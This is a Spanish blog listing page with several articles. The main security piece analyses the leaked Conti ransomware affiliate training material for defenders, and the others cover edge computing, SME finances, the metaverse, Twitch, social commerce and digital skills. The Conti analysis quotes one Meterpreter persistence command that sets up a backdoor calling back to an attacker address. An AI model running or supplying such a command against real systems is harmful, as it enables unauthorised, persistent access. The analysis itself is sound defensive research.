Raúl Alonso Fundamental para el ‘networking’: ¿eres un hombre con estilo? Seducir es importante. Cuando asistes a un evento o practicas networking, “si no pasas ese primer filtro visual, se te puede escapar un buen amigo, contacto o incluso un...
Guillermo Conde Internet: Reyes Magos todo el año. Algunas veces es importante alejarse de las situaciones para tomar perspectiva y advertir los avances que se han producido en los últimos tiempos sin quedarnos con la sensación de...
Raúl Salgado Seis antídotos contra las crisis de empresa La pérdida de clientes, la caída de las ventas, la fuga de talento, el robo de datos, el incremento de la competencia y un largo etcétera son algunas de...
Ideas Locas, CDO de Telefónica Deep Learning con Python: Introducción a TensorFlow (Parte II) Escrito por Enrique Blanco (Investigador en CDO) y Fran Ramírez (Investigador de seguridad informática en Eleven Paths) Este artículo es el segundo de nuestra serie de introducción al Deep Learning con Python haciendo uso del framework TensorFlow. En el...
Diego Samuel Espitia La ruta de nuestra herramienta PackageDNA durante 2021 Para dar contexto, PackageDNA es nuestro framework open source de análisis de paquetes de los principales lenguajes de programación, con el que buscamos ofrecer una herramienta que cubra la...
ElevenPaths #NoticiasCiberseguridad: Boletín de ciberseguridad semanal 17-21 de febrero Google AdSense, Cisco y Emotet, entre otros, protagonizan el informe de noticias de ciberseguridad de esta semana, realizado por nuestros expertos del SCC.
Open Future Digitalización en restaurantes: cómo pedir y pagar con el móvil En los últimos años hemos visto cómo la tecnología ha revolucionado prácticamente todos los sectores. Aunque la experiencia presencial del cliente de restauración sigue siendo bastante similar, la digitalización...
Kassandra Block Chema Alonso presenta en el MWC22 las novedades del Hogar Digital en colaboración con Microsoft En el contexto del MWC22, celebrado entre el 28 de febrero y el 3 de marzo en Barcelona, Chema Alonso, Chief Digital Officer de Telefónica, anunció en su charla...
¿Qué contiene el “curso en ciberseguridad” que deben seguir los atacantes afiliados de Conti, el ransomware de éxito?Sergio de los Santos 22 diciembre, 2021 Un miembro de la banda Conti (en realidad quizás deberíamos hablar de programa de afiliación) publicó en agosto el material técnico y guías que deben seguir los afiliados para entrar en una compañía, robar todo lo posible y cifrar los datos. Una vez ahí, la organización Conti les extorsionará con publicar los datos si no pagan el rescate. Hemos echado un vistazo a esa información técnica con la que entrenan a los atacantes que entrarán en la red de la futura víctima. Con esto podemos entender qué consideran que es necesario para vulnerar una empresa hasta el punto de cifrar sus entrañas y, por tanto, cómo defendernos mejor. Un poco de contexto Esta persona parece un pentester enfadado por lo poco que le pagan por entrar en las redes de las empresas y por tanto comparte los servidores de Cobalt y el material de entrenamiento. Quien compartió esto ya hizo un pequeño análisis. Además de desvelar algunos de los C2C de Cobalt Strike donde las víctimas se conectan para comunicarse con su beacon. También filtró un “Manuals for hard workers and software.rar”, en el que se encuentran varios ficheros TXT con instrucciones. Lo curioso es que en ellos no hay nada del otro mundo. Pasos básicos conocidos por muchos para exfiltrar información con algunas curiosidades. Por ejemplo, que automatizan la subida de ficheros a Mega. También los típicos movimientos laterales, control de directorio activo, configurar redes Tor… un recetario muy sencillo fundamentalmente en PowerShell. En la imagen se resume el análisis de lo filtrado por esta persona. Y además 30GB de material de entrenamiento técnico Pero es que además, hace poco, se han filtrado 30GB de material de entrenamiento para los técnicos. Hemos echado un vistazo al “training material”. La realidad es que, si bien no desvela complicados 0days o técnicas desconocidas, es cierto que sirve como un curso de ciberseguridad avanzado con todo un recetario para tener siempre a mano. No diríamos que contiene información especialmente desconocida. De hecho, es material que puede encontrarse en cualquier curso de ciberseguridad ofensiva. Su mayor valor, por tanto, está en la recopilación en sí, tanto en la cantidad como en la elección concreta del material seleccionado para los pentesters. Esto nos permite comprender cómo se explotan estos fallos en la vida real, en el del día a día del ransomware y cómo puede reaccionar la ciberseguridad de una compañía. Conociendo el recetario de los atacantes (que muchas de las veces atacarán de forma rutinaria sin variar mucho los ingredientes) se podría llegar a proteger más y mejor una red. En los 30GB encontramos esta estructura de directorios. Recetas en PowerShell, instrucciones precisas en TXT sobre cómo volcar bases de datos o recuperar nombres de usuarios de un directorio activo… En el “training material leak”, con más de 30GB de información, podemos encontrar estas rutas básicas con su tamaño aproximado: * 2.1GB. 1. Crack 2019.rar. Dentro contiene un curso de ensamblador, de cracker y de reverser. Es un curso en Flash e incluye el software Flash Player Pro con una licencia pirata. Incluye decenas y decenas de ejemplos de código ensamblador y cómo compilarlo. El curso de cracker y reversing contiene muchos vídeos AVI comentados no profesionales en los que se enseña en ruso los rudimentos y mil ejemplos. * 4.4GB 10. Attacking and Defending Active Directory.rar. Contiene este documento: Esos enlaces llevan a una zona privada de https://www.pentesteracademy.com, pero el curso incluye los vídeos descargados. También un TXT con un recetario. Todos los docs tienen los mismos metadatos: Alexey Litvinenko (espía ruso envenenado con polonio en 2006) como autor y Grizzli777 como compañía. Al parecer es común en Words piratas. * 1.5GB 2.Metasploit US.rar. Este módulo son todo vídeos y pequeños TXT con recetas como esta: Post better understand the victimescalation of privilegesdeleting logs and monitoring programsdata collection and exploitationanchoring and entrancespivot network Post 5. anchoring and entrances meterpretor > run persistence -h meterpretor > run persistence -A -L c:\\ -X -i 10 -p 443 -r 192.168.2.140 Con curiosidades como exploits para XP. 5.3GB 4.Network Pentesting.rar. Contiene estos directorios autoexplicativos: Dentro, todos son vídeos, esta vez de cursos privados de SecurityTube. Algunos títulos de vídeos: * 1.1GB 5.Cobalt Strike.rar. Todo vídeos. Con cabeceras al estilo Marvel como esta: Un vídeo específico es para el fallo ZeroLogon 2020-1472. 1.7GB 6.Powershell for Pentesters.rar. Más y más vídeos con todo tipo de trucos de Powershell. Todos de SecurityTube. 0.6GB 7. Windows Red Team Lab.rar. Muy poquitos vídeos y este TXT 1.6GB 8. WMI Attacks and Defense.rar. Algunos vídeos sobre el tema, impartidos por lasmismas persona de SecurityTube, pero con el logo de PentesterAcademy.com * 0.6GB 9. Abusing SQL Server Trusts in a Windows Domain.rar. Algunos vídeos y ciertas recetas: 6.2GB GeekBrayns Reverse Engineering.rar. En realidad es bastante material de la página https://gb.ru con vídeos, documentos y PPTs. 1GB GCB.zip. Parece un curso de cyberrange de PentesterAcademy, con vídeos. Conclusiones Todo un curso en el que fundamentalmente hay vídeos (muchos de ellos de varias horas). ¿Son clases especiales? No, es material de pentesterAcademy y securityTube principalmente. Le acompañan PDFs, la inmensa mayoría son las presentaciones usadas en el vídeo. También vemos algunos TXT con “recetas” y atajos y algunos documentos con enlaces a más información. Abarca desde el más bajo nivel (el curso de ensamblador es bastante extenso) hasta el AD. No hay más (ni tampoco menos). Es un curso completo de seguridad ofensiva muy orientado a entrar en un sistema y realizar la operativa esencial antes del cifrado, todo sacado de fuentes públicas o privados pero de ninguna forma revela algo nuevo más allá del esfuerzo de la recopilación. Boletín semanal de ciberseguridad 11 – 17 diciembreSnip3, una investigación sobre malware
2021: el año en que el Edge Computing llegó a nuestras vidasEmilio Moreno 21 diciembre, 2021 Aprovechando que estamos a final de año, es un buen momento para mirar hacia atrás y ver cómo ha llegado el Edge a nuestras vidas. En mi caso personal, en 2021 el Edge Computing ha entrado de lleno, al tener la suerte de asumir responsabilidades en el área. Desde el punto de vista de Telefónica, 2021 ha sido un año importante en la relación con el Edge Computing. Desde el punto de vista de infraestructura, ya contamos con una oferta comercial (VDC-Edge) que permite a nuestros clientes disfrutar de las ventajas de Edge. En paralelo, hemos mostrado nuevos ejemplos de innovación con nuestros clientes en el área, demostrando que hay retos tecnológicos que pueden ser resueltos mediante este nuevo paradigma. Pero siempre queda un margen de duda acerca del impacto real que está teniendo. ¿Es un término de moda al que toda la industria está ansioso por adherirse? Hace ya algún tiempo, cuando el término de Cloud Computing comenzó a popularizarse, recuerdo haber visto soluciones “clásicas” que con una pequeña capa de barniz rápidamente se postulaban como soluciones Cloud. Gartner, uno de los analistas de referencia en tecnología, posiciona en agosto de este año el término Edge Computing, en el punto más alto del “pico de expectativas infladas” de sus clásicos “Hype Cycle”. Obviamente, cuando las expectativas son grandes, existe el riesgo de que no se materialicen completamente y generen desilusión. En este caso particular, independientemente de las ilusiones de cada actor en la industria, veo algunos factores que me parecen interesantes y que me hacen pensar que el impacto del Edge va a ser muy significativo. Es poco probable que lleguemos a tener referencias temporales del tipo “antes del Edge” o después del Edge, pero sí que va a influir notablemente en nuestras vidas. Uno de ellos es la llegada del 5G “de verdad”, el 5G SA (StandAlone). Aunque ya disfrutamos desde hace meses del 5G, el despliegue de la versión SA va a suponer la llegada de nuevas capacidades, como el Network Slicing, que suponen un salto enorme. Y no hay que olvidar el latente conflicto geopolítico en relación al 5G entre China y USA, que puede llevar a dividir el mundo en bloques tecnológicos aislados. Esta rivalidad latente es muestra de que el 5G es más que un mercado multimillonario, sino que influye directa y poderosamente en otros sectores económicos y en general, en nuestras vidas. El otro, es que se está trabajando intensamente con socios y usuarios finales en la identificación de casos de uso que demanden esta tecnología, y que permitan mejorar la oferta y crear una nueva generación de servicios a los usuarios. Es un cambio sustancial frente a un enfoque clásico de diseñar un producto, lanzarlo y esperar a que llegue la demanda. En mi opinión, va a contribuir a que nuestros clientes empresariales puedan imaginar servicios, tecnologías y casos de uso que hasta ahora ni podían contemplar y que se apoyen en Edge para llegar al mercado. Por eso, esperemos que el 2022 veamos explotar el Edge. Y mientras llega este momento, ¡Feliz Navidad y 2022 para todos! Servicios Cloud que favorecen el teletrabajoEdge Computing, 3 historias de éxito
Morosidad, falta de liquidez y digitalización, las preocupaciones con las que las pymes cierran el añoMar Carpena 21 diciembre, 2021 Tras meses intentando hacer frente al parón al que la pandemia obligó a muchas de ellas, hoy la mayor parte de las pequeñas y medianas empresas contemplan el futuro con preocupación. No en vano, su salud financiera no es la más deseable. La crisis económica provocada por la COVID-19 ha hecho que muchas de ellas no hayan podido superar la entrada de este virus en sus cuentas. Concretamente y según el estudio Concursos y Disoluciones, realizado por Informa, en los diez primeros meses de 2021, un total de 22.104 empresas se han disuelto en España, un 23% más que el año anterior. Han sido cierres acompañados de concursos de acreedores que también se han incrementado en un 40%, cifrándose en un total de 4.933 durante esos meses. Y, como suele ocurrir, han sido las micropymes las más afectadas, protagonizando el 86% de los concursos presentados. Pero si nos centramos en las que han logrado seguir adelante, la situación es algo mejor que hace unos meses, aunque sigue teniendo importantes fantasmas. Vulnerables, preocupadas y sufriendo. Así se encuentran las pequeñas y medianas empresas en nuestro país, si nos fijamos en la información que maneja Cepyme, la Confederación Española de la Pequeña y la Mediana Empresa. En opinión de su presidente, Gerardo Cueva, actualmente las pymes están preocupadas por la morosidad, la falta de liquidez o el alto endeudamiento que protagonizan y que podría suponer una restricción al crédito. Deudas y restricciones al crédito Según los últimos datos que ha analizado Cepyme, las nuevas operaciones de crédito alcanzaron los 146.860 millones de euros en el primer semestre de 2021, el nivel más bajo para este periodo desde que se comenzaron a publicar datos, en el año 2010. En términos relativos, la caída del crédito nuevo ha sido del 38,6% en el segundo trimestre de 2021, en comparación con el mismo periodo del año anterior, cuando se generalizaron los avales del ICO para afrontar la pandemia. Sin embargo, la caída también alcanza el 11% en comparación con los datos de nuevo crédito del año 2019, cuando aún no había estallado la crisis del coronavirus. Cepyme alerta de que la restricción del crédito dificultará la recuperación de las empresas, tanto a la parte del tejido empresarial más perjudicado por las restricciones y la caída de la actividad, que son especialmente pymes de los sectores del pequeño comercio y ramas de actividad vinculadas al turismo, como a empresas con algo más de tamaño, que ven lastrada la inversión para estos meses de recuperación. Facturas fuera del plazo de pago La morosidad es otro de los grandes quebraderos de cabeza de las pymes. De nuevo, según datos de Cepyme, el 70% de las facturas con empresas están fuera del plazo legal para pagarlas y suponen “más de 264.000 millones”, a lo que se suma la morosidad con el sector público. En esta línea, un informe del Banco de España asegura que se observa un incremento notable en el riesgo de impago asociado a los préstamos ICO por la COVID-19. El volumen de operaciones que han sido clasificadas por las entidades financieras en “vigilancia especial” se ha duplicado hasta el 16%. Esa especial vigilancia se aplica a los deudores que, manteniendo aún el pago de sus operaciones, muestran síntomas de debilidad para poder afrontar en el futuro el pago de sus cuotas. Una complicada situación a la que no ayuda la falta de suministros, la subida de materias primas o el elevado coste de la luz, como tampoco lo hace la necesidad de digitalización a la que muchas se enfrentan, sin los conocimientos ni recursos necesarios. Por todo ello, cada vez son más las pymes que valoran y comienzan a recurrir a nuevas fuentes de financiación más allá de los préstamos bancarios. Las líneas de crédito, los préstamos participativos o nuevas fórmulas como el leasing o el factoring comienzan a tomar forma entre las más pequeñas. Kit Digital, una ayuda más que necesaria Por ello, anuncios como la llegada del Kit Digital, a partir del próximo mes de febrero, son un soplo de esperanza. Concretamente, se espera que, en esa fecha, arranque la primera fase del programa, con ayudas por un valor total de 500 millones de euros y destinadas a las pymes de entre 10 y 49 empleados. En una segunda fase, será el turno de las microempresas y autónomos. Comercio electrónico, marketing digital o ciberseguridad son algunas de las áreas para las que podrán solicitarse estas ayudas, ámbitos en los que las pequeñas y medianas empresas siguen teniendo un largo camino por recorrer. Una digitalización para la que el mercado cada día tiene más respuestas y las grandes compañías tecnológicas están adaptando toda su oferta a precisamente las necesidades de las pymes. Así, 2022 se presenta ante nosotros como un año de nuevo complicado, en el que las pequeñas y medianas empresas seguirán teniendo que hacer frente a numerosas trabas. Una travesía en la que la transformación digital será el auténtico salvavidas para muchas de ellas. Más ventas, nuevas oportunidades de negocio, clientes más fieles… La era digital no solo permitirá que muchas de las pymes de nuestro país puedan seguir adelante, sino que además les ayudará a seguir siendo competitivas. Por todo ello, si 2021 fue el año en el que la pandemia aceleró la incorporación de muchos de estos pequeños negocios a la digitalización, 2022 será el año definitivo para seguir trabajando en una tendencia que ya una realidad. Foto de Christian Erfurt en Unsplash Prepara tu negocio para un futuro sin dinero en efectivoCrowdfunding para validar un proyecto empresarial
El metaverso, una oportunidad para la industria españolaJosé Carlos Martín Marco 21 diciembre, 2021 Sin duda la palabra metaverso está de moda. El pasado 29 de octubre, un día después de que Facebook anunciara su universo paralelo al mundo físico, se produjo un máximo histórico de popularidad en las búsquedas del término metaverso, según Google Trends. Desde entonces hasta ahora, más de un mes después, el interés se ha mantenido estable en alrededor de una cuarta parte de dicho máximo, lo cual es mucho si lo comparamos con otras “modas”. El concepto de metaverso ha calado y, como si de las piezas de un dominó se tratase, muchas compañías- tecnológicas y no tanto- están anunciando iniciativas en este sentido. En ellas también aparecen otras tecnologías como blockchain o la inteligencia artificial, que no hacen sino ampliar las posibilidades del metaverso. «La obligación de comprender estos nuevos mundos y establecer valores” Aparte de la estrategia en este sentido de dos gigantes como Facebook y Microsoft, cuya base de usuarios en mi opinión es capaz de movernos al metaverso, también otras empresas tienen mucho que decir. Deben, además, jugar un papel significativo para que “no todo valga”. Como señalaba recientemente el presidente de Telefónica, José Mª Álvarez-Pallete, “si dejamos que cada gran tecnológica cree su metaverso, cada una será su propio país con su propia moneda… con sus reglas… Tenemos la obligación de comprender estos nuevos mundos y establecer valores. Creo que en estos momentos España está posicionada para hablar de ello con legitimidad porque tenemos las mejores infraestructuras digitales y somos vanguardia en muchos de esos aspectos”. Avanzado posicionamiento de la industria española El avanzado posicionamiento de la industria española también quedó patente en una reunión reciente en Linkedin, organizada por Boris Valls: “Metaverso: evolución y campos de aplicación”, que tuve ocasión de escuchar en directo. En ella se comentó que habrá muchos metaversos, orientados a distintos propósitos y con distintos perfiles de usuarios. Y a todos ellos habrá que dotarlos de contenidos, segmento en el que la industria española está muy bien posicionada. En dicho encuentro participó Peter Lozano, cofundador de Imascono, empresa especializada en tecnologías de realidad aumentada, virtual y mixta, de la que ya hemos escrito en este blog por la estrecha relación que mantiene con Telefónica. Imascono acaba de celebrar su X aniversario en el Palacio de Congresos de Zaragoza ante mil asistentes, entre los que había muchas caras conocidas de la política y el mundo empresarial aragonés. Fue un evento futurista por todo lo alto, titulado “Imaginación aplicada”, en el que estos jóvenes soñadores pasaron revista a diez años de éxitos y anunciaron el comienzo de una nueva era para Imascono. Ha sido la excusa perfecta para entrevistar a Peter, que todavía hablaba emocionado del encuentro en nuestra conversación. La empresa zaragozana no quiere perder su seña de identidad en esta nueva etapa, ese humanismo tecnológico tan necesario en un mundo que avanza a toda velocidad y en el que empiezan a hacerse realidad escenarios de ciencia ficción impensables hasta ahora. “La tecnología no es un fin, sino un medio”- recalca Peter en nuestra conversación. Insiste en que no todo vale. La tecnología al servicio de las personas en el metaverso empresarial Peter asegura que el metaverso empresarial será una realidad pero hace hincapié en que la tecnología debe estar al servicio de las personas y que hay que digitalizarse con sentido. Este es uno de los pilares de Imascono, como se puso de manifiesto en el evento conmemorativo de su X aniversario. Un escenario híbrido en el que convivirán el mundo real y el virtual El pasado día 2 de diciembre su proyecto de ofrenda virtual con motivo de la Fiesta del Pilar recibía el Premio Comprendedor B2B de la Fundación Empresa y Sociedad en la categoría de Marketing y ventas. Resulta de especial interés cuando se atisba que en un futuro quizá no tan lejano conviviremos con dos posibilidades: la real y la virtual. En 2020, debido a la imposibilidad de acudir físicamente a la Basílica del Pilar debido al confinamiento, Imascono creo un escenario virtual en 3D accesible a través de una página web, para que quienes quisieran continuar con la tradición de la ofrenda pudieran hacerlo, sin ver truncada la tradición. Se superaron las 147.000 ofrendas virtuales y la web recibió más de 361.000 visitas. Este año, ya sin limitaciones físicas, han mantenido la posibilidad de hacer la ofrenda virtual y se han recibido más de 21.000 ramos virtuales y más de 100.000 visitas, con un aumento significativo del tiempo de permanencia del usuario en el entorno virtual. Este escenario híbrido que, sin duda, será cada vez más frecuente, muestra la posibilidad de convivencia de ambos entornos. Al término de nuestra conversación Peter deja la puerta abierta a contarnos muy pronto nuevos proyectos muy interesantes en colaboración con Telefónica. Sin duda, el mundo de los contenidos con los que equipar a los distintos metaversos que se están anunciando está en plena ebullición y supone una ocasión irrepetible para poner en valor el talento español y dotarlos de humanidad. Imagen: Pixabay/Julientromeur WiFi: dos décadas de historia y el futuro por delanteDune, el planeta de los CEO
Twitch, la reina de su nicho, ¿puede ser usada para negocios?Jorge A. Hernández 20 diciembre, 2021 Hasta octubre de 2021, Twitch la red social basada en el streaming de videojuegos acumulaba más de 18.500 millones de horas vistas por sus consumidores. Se trataba de la líder indiscutible de su nicho, pero ¿qué significa esto para otras empresas? La respuesta obvia es: una oportunidad de negocios para llegar a un grupo demográfico muy específico, gamers y amantes de los deportes (electrónicos y tradicionales). Recordemos que Twitch nació oficialmente en 2011 como una plataforma de streaming de deportes electrónicos pero en 2014 fue adquirida por Amazon en una transacción valorada en 970 millones de dólares. Desde aquel entonces se ha posicionado como la líder indiscutible de ese segmento superando otras plataformas como Youtube Gaming, Facebook Gaming, Bigo y Ubeat, entre otras. Y si hiciéramos un símil, con servicios de video, Twitch sería el Netflix de su categoría con una participación del mercado superior al 63%. Contenido e influenciadores El secreto del éxito de Twitch es su contenido y dentro del mismo los streamers o influenciadores. Una mezcla usada por varias empresas incluso de deportes convencionales. Por ejemplo, en 2021, la Asociación Nacional de Baloncesto (NBA) de los Estados Unidos desarrolló campañas a través de reconocidos influenciadores de Twitch generando no solo millones de visitas, también más 66 mil mensajes de respuesta (engagement) de los espectadores. También se han realizado alianzas con servicios de entrega de bienes y comida a domicilio con plataformas como DoorDash. Y es que, según los directivos de esta plataforma, los servicios de comida rápida y los deportes son una pareja de vieja data. Otras verticales unidas a esta tendencia son los servicios de pagos como American Express que crearon alertas especiales en Twitch con eventos deportivos para ofrecer beneficios según el trámite de cada partido. Por ejemplo, 30% de descuento a sus clientes si un jugador hacía una canasta de tres puntos. Más allá de los juegos Pero la plataforma Twitch no solo ha servido para hablar de videojuegos y deportes, también ha servido como escenario incluso para políticos como ocurrió en 2020 con la demócrata Alexandria Ocasio-Cortez. Y es que Twitch, para mantener su ritmo de crecimiento, ha tenido que mirar más allá de la simple transmisión de eventos para crear nuevas categorías como “Just Chatting”. Se trata de un nicho que va desde charlas informales hasta mini realities. Just Chatting ha sido una categoría que en poco tiempo ha logrado acaparar 12% de los espectadores de Twitch y que ha abierto la puerta a nuevos tipos de contenidos, o dicho de otro modo, es una oportunidad para generar todo tipo de contenido que puede interesar a todos. Entre ellos empresas. Foto de Tanner Boriack en Unsplash
Social commerce, cuando las ventas se mezclan con las redesJorge A. Hernández 20 diciembre, 2021 La pandemia sirvió para ver la sociedad como un ente en constante evolución entre la transformación digital, los consumidores empoderados, el teletrabajo y por supuesto, el comercio electrónico. Dentro de éste se destaca una tendencia que ha ido creciendo cada día: el social commerce. El comercio social, social commerce o social shopping podemos definirlo, en esencia, como una mezcla entre las redes sociales y las plataformas de ventas sobre Internet. O, dicho de otra forma, el uso de redes sociales como un canal de ventas. La importancia de este canal salta a la vista cuando tenemos en cuenta el tiempo diario que las personas gastan en redes sociales. Una cifra que crece anualmente, de 56.23 minutos en 2019 a 65.44 minutos en 2020. Y es que el social commerce junto a la realidad aumentada son dos de las tendencias que más se esperan en el 2022. Y en países como Colombia este promedio aumenta. De hecho, el país cafetero es el segundo que más tiempo gasta en redes sociales con un promedio de 3 horas y 45 minutos al día. Ventajas del social commerce Una de las cosas más interesantes del social commerce son sus beneficios para ambos lados de la cadena: los consumidores y las empresas. Para los usuarios existen ventajas claras como que ya están en las redes sociales por lo cual no deben “desplazarse” a otro lugar web para realizar una compra. Por ser una experiencia “social” es fácil consultar la experiencia de otros amigos o incluso saber si ya han comprado esa marca y la recomiendan en sus publicaciones. Incluso, algunas redes permiten simplificar la compra usando un botón, sin necesidad de gestionar e introducir datos que ya existen en las mismas redes que están usando. Por otra parte, las empresas tienen beneficios tal vez mayores como una selección ultra precisa de su grupo objetivo además de poder entrar en contacto directamente con ellos. Las redes sociales son un medio más transparente e inmediato. Un canal que ya existe y que en países como Estados Unidos creció, en 2021, más de 34% llegando a los 36 mil millones de dólares. Una cifra inmensa pero que apenas representa 4.3% del total de ventas del retail. Estas cifras nos muestran que el potencial del social commerce apenas está comenzando. Además, es necesario superar algunos retos, en Argentina, por ejemplo, aún existe una alta desconfianza para comprar en redes sociales en contraste con algunos otros países de la región como Brasil o Colombia. En este último el e-commerce se lleva el 34% de favorabilidad, versus el social-commerce que tiene el 23%. Foto de John Schnobrich en Unsplash
Wayra, 10 años reescribiendo las reglasInnovation Marketing Team 20 diciembre, 2021 Una década da para mucho. Y si hablamos de innovación, todavía más. En 2011, nacía Wayra con un objetivo muy claro: impulsar el espíritu emprendedor proporcionando apoyo financiero y posibilidades de desarrollo comercial a su cartera de empresas. Las startups, por su parte, ofrecerían productos y servicios que Telefónica podría escalar presentándoselos a sus más de 350 millones de clientes. Diez años después, podemos decir que este objetivo se ha cumplido, continúa y, además, con un compromiso todavía más fortalecido con la innovación abierta. Más allá de Silicon Valley Durante estos 10 años, Wayra ha ayudado a crear y transformar ecosistemas de emprendimiento locales en Europa y América Latina con más de 800 startups invertidas, que han supuesto la creación de más de 10.000 empleos de alta cualificación. “Hace 10 años vimos que, no solo podíamos innovar desde dentro, sino que teníamos que abrirnos al mundo exterior, a todas esas cosas maravillosas que estaban pasando, y trabajar con emprendedores para construir un futuro mejor todos juntos”, explica Paloma Castellano, directora de Wayra Madrid. Desde entonces, como reconoce Marta Antúnez, directora de Wayra Barcelona: “Día a día trabajan con Telefónica más de 250 empresas invertidas, mejorando sus procesos y llevando lo último en innovación a la red de clientes del Grupo, un impacto que supera los 285 millones de euros”. El proyecto de innovación abierta más global La innovación lleva implícita la transformación. Y eso es lo que ha hecho Wayra en estos 10 años siendo hoy el proyecto de innovación abierta más global de Telefónica. En 2018 nacía Wayra Activation Programme con el objetivo de abrir las plataformas tecnológicas de Telefónica a las startups. Ese mismo año, se presentaba una Wayra mucho más madura y con startups puramente tecnológicas. Dos años después, en 2020, se sumaban al proyecto iniciativas como WayraX, el hub virtual para invertir en startups 100% digitales, o Wayra Builder, el venture builder corporativo para crear junto a otros inversores startups innovadoras nacidas de proyectos tecnológicos internos de Telefónica. Inventando el futuro Uno de los grandes desafíos de Wayra es reducir la brecha de género en un sector en el que solo uno de cada seis fundadores de startups es mujer. En 2015, Wayra puso en marcha la iniciativa Scale Up Women para visibilizar el emprendimiento femenino e impulsar la inversión en startups lideradas por mujeres. Prueba de esta apuesta es el hecho de que 4 de los 8 hubs de Wayra en Europa y Latinoamérica están liderados por mujeres. Wayra celebra su décimo aniversario en pleno proceso de transformación y, como no puede ser de otra manera, lo hace reinventándose cada día para desarrollar productos digitales que ayuden a mejorar la vida de las personas de todo el mundo. Wayra es el futuro de lo que debe ser TelefónicaChema Alonso El Hall of Fame de las startups de Telefónica Open InnovationIdoven, la startup de diagnóstico en remoto para prevenir enfermedades cardíacas
Las 8 competencias digitales para adaptarse a los cambiosRaúl Salgado 20 diciembre, 2021 La mayoría de las veces no es cuestión de fuerza. Ni de maña. Y es que las competencias más demandadas en el mundo laboral de hace apenas unos años poco tenían que ver con las de ahora, sobre todo debido al avance arrollador de la palabra más de moda: la digitalización. Javier Rodríguez Zapatero, uno de los mayores expertos españoles en el mundo digital, asegura que «la digitalización es una cuestión de vida o muerte» y apremia a aprovechar los fondos europeos para impulsarla tanto desde el Gobierno como desde las empresas, lo que a su juicio requiere un cambio del modelo educativo. En este marco, los expertos advierten de la imperiosa necesidad de formar talento capaz de sacar provecho de las ventajas de la digitalización. Sin olvidar, claro está, la adaptabilidad, la flexibilidad o el liderazgo; ni las destrezas vinculadas al sector tecnológico en áreas como la ciberseguridad y el cloud computing, la inteligencia artificial, el marketing digital, la gestión de datos, la automatización de los procesos, etc. Competencias digitales ineludibles Hermel Balcázar, CEO de Aicad Business School, escuela de negocios de referencia internacional en el ámbito de la formación, destaca la importancia de administrar la información y el conocimiento de la transformación digital, la gestión de equipos, el liderazgo y la comunicación. A su juicio, estas son las ocho competencias digitales más importantes: 1. Conocimiento digital Esta capacidad permite al profesional aportar un valor añadido a la empresa y aumentar las opciones de innovación, adaptación y conocimiento del entorno, lo que le ayuda a anticiparse a los cambios. En opinión de Balcázar, esto también posibilita a las empresas incrementar la productividad, descubrir el talento, generar seguridad, optimizar la gestión de los procesos y mejorar la flexibilidad y la eficiencia. 2. Gestión de la información Para identificar, localizar, recuperar, almacenar, organizar y analizar información digital, hay que actuar de manera práctica y efectiva. Y ello ayuda a las compañías a generar conocimiento, desarrollar inteligencia de negocio, posibilitar la innovación, posicionar la marca y mejorar la eficiencia de los procesos. 3. Comunicación digital El CEO de Aicad Business School recuerda que la comunicación en entornos digitales permite participar en eventos y conversaciones, estar presente en redes sociales y espacios colaborativos de interés, así como mantener contactos profesionales. E indica que contribuye a generar conocimiento de clientes y de mercado, aumentar la productividad y la eficiencia de la organización, favorecer el posicionamiento de la marca, incrementar su visibilidad, reducir los riesgos de sufrir una crisis reputacional, etcétera. 4. Aprendizaje continuo Nuestro futuro como individuos y como sociedad depende de la capacidad de aprender, sobre todo en entornos digitales, cuya transformación no cesa. Ocupe o no lugar, el saber se ve favorecido por la plasticidad del cerebro. Y este aprendizaje continuo, según Balcázar, también mejora la eficiencia, moderniza la empresa, aumenta la competitividad y favorece la innovación. 5. Visión estratégica Una cosa es adaptarse y otra bien distinta es anticiparse. Y, en estos tiempos que vuelan, ahí reside el quid de la cuestión. Pues bien, la visión estratégica ayuda a prevenir los cambios del mercado para incluirlos en la planificación de los proyectos. “El profesional debe ser capaz de tener una visión digital e incluir nuevas estrategias, de generar ideas innovadoras que aporten valor a la empresa y desempeñar el papel de visionario para encontrar nuevas oportunidades de negocio”. La visión estratégica impulsa la motivación, orienta y da sentido al trabajo diario, abre oportunidades de negocio al permitir adelantarse a la competencia e innovar, contribuye a lograr la excelencia y favorece la sostenibilidad de la organización. 6. Liderazgo en red Pese a encontrarse en caída libre, hoy en día el teletrabajo casi duplica al registrado antes de la pandemia, lo que afecta directamente a los equipos. Por ello, los jefes han de saber traspasar responsabilidades y fomentar la colaboración, el diálogo y la comunicación a través de las herramientas digitales. En este marco, Balcázar apunta que el liderazgo en red optimiza la eficacia de los procesos, mejora el aprovechamiento de los recursos de la organización, favorece el valor y la construcción de la marca a nivel interno, refuerza la capacidad de guiar la transformación digital, genera ventajas competitivas y ayuda a integrar las plantillas. 7. Trabajo en red Un compañero que trabaja desde la oficina, otro desde su habitación, otro desde la casa del pueblo… El trabajo en red permite estar operativo desde cualquier lugar, pero requiere una capacitación para colaborar y cooperar en entornos digitales con otros profesionales y equipos. El CEO de Aicad Business School asegura que cuando una empresa fomenta el desarrollo del trabajo en red suma el conocimiento que posee cada uno de los miembros del equipo, permitiendo que unos aprendan de otros. Asimismo, afirma que el trabajo en red fomenta el sentido de pertenencia a la organización, permite alinear los objetivos, aumenta la eficacia de los procesos y promueve la creatividad e innovación. “Al trabajar en red, se generan espacios donde se puede compartir en equipo no sólo las tareas, sino también los logros, ideas e inquietudes. Se debe valorar también la riqueza que aporta la diferencia y la diversidad, la cual sin duda favorece la posibilidad de contar con soluciones más creativas. El todo es más que la suma de las partes”, apostilla Balcázar. 8. Orientación al cliente Al margen de que tenga o no siempre la razón, lo cierto es que el cliente forma el eje en torno al que debe girar toda estrategia de negocio. De ahí que entre las principales competencias digitales también se encuentre la de conocer, entender, comprender, interactuar y satisfacer sus necesidades. “La orientación al cliente es una actitud permanente para detectar y satisfacer sus prioridades particulares”. Las seis leyes del customer experience Y, en este punto, Balcázar enumera las seis leyes que mueven el customer experience: Toda interacción crea una reacción.Las personas son egocéntricas por instinto.La cercanía al cliente crea alineamiento.Los empleados no comprometidos no crean clientes comprometidos.Los empleados hacen lo que se mide, motiva y celebra.No se puede falsear o disimular. Las competencias digitales son la clave para fortalecer las habilidades en la toma de decisiones financieras y, al mismo tiempo, la innovación y el acceso a una nueva era de relaciones basadas en redes solidarias de negocio. “Estamos en un cambio de era, pero también en una era de muchos cambios, donde lo digital marca el ritmo. Aquellos profesionales capaces de adaptarse a las nuevas necesidades serán los que consigan acceder a empleos de mayor calidad y remuneración. Se convertirán en ese talento decisivo que buscan las empresas, y marcarán las pautas en su evolución; en un entorno de trabajo, de retos y, a su vez, de 